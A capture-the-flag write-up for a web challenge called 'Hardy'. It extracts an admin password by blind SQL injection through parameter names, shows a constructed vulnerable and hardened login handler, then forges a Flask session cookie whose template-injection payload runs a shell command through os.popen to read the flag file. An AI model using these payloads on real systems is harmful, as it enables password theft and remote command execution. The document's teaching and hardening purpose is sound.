Web - Hardy

No source code was provided

Solution

The parameter names themselves are vulnerable to SQL injection.

Dumping the admin password

username=admin&SUBSTRING(password,1,1)=I
username=admin&SUBSTRING(password,1,2)=IL
username=admin&SUBSTRING(password,1,3)=ILI

Continuing one character at a time gives the full admin password: ILIKEpotatoesSOMUCH::&&
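The server-side pattern that would produce this behaviour, next to a fixed version, as an added example (not the challenge's code, which was not provided). It assumes the handler builds its WHERE clause from the form keys; the table, function names and password are constructed, and SQLite's SUBSTR stands in for SUBSTRING.

```python
import sqlite3

EXPECTED_FIELDS = {"username", "password"}

def make_db():
    """Constructed in-memory users table with a made-up password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", "Tr0ub4dor"))
    return db

def login_vulnerable(db, form):
    """Assumed bug: form keys are pasted into the SQL text; only values are bound."""
    where = " AND ".join(f"{name} = ?" for name in form)
    sql = f"SELECT 1 FROM users WHERE {where}"
    return db.execute(sql, list(form.values())).fetchone() is not None

def login_hardened(db, form):
    """Fixed SQL text; request keys are validated and never reach the query string."""
    if set(form) != EXPECTED_FIELDS:
        raise ValueError(f"unexpected fields: {sorted(set(form) ^ EXPECTED_FIELDS)}")
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    # A real application would verify a password hash instead of comparing plaintext.
    row = db.execute(sql, (form["username"], form["password"])).fetchone()
    return row is not None

def demo():
    db = make_db()
    # Same shape as the requests above; SQLite spells the function SUBSTR.
    probe_hit = {"username": "admin", "SUBSTR(password,1,1)": "T"}
    probe_miss = {"username": "admin", "SUBSTR(password,1,1)": "X"}
    results = {
        "vulnerable_hit": login_vulnerable(db, probe_hit),
        "vulnerable_miss": login_vulnerable(db, probe_miss),
        "hardened_ok": login_hardened(db, {"username": "admin", "password": "Tr0ub4dor"}),
    }
    try:
        login_hardened(db, probe_hit)
        results["hardened_probe"] = "accepted"
    except ValueError:
        results["hardened_probe"] = "rejected"
    return results

if __name__ == "__main__":
    print(demo())
```

The differing true/false answers from `login_vulnerable` are the oracle the requests above rely on; the hardened handler rejects any request whose field names are not exactly the expected set.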

The password is also used as the JWT secret, and the application is vulnerable to SSTI through the cookie's type value: {'type':'{{<payload>}}'}

The Flag

flask-unsign --sign \
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"
